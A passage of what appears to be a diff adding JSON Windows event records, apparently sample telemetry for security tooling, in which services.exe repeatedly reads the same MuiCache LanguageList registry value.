"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 